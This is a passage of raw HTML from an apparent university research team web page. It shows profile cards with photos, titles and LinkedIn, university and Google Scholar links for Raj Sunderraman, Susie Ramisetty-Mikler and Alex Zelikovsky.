data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" 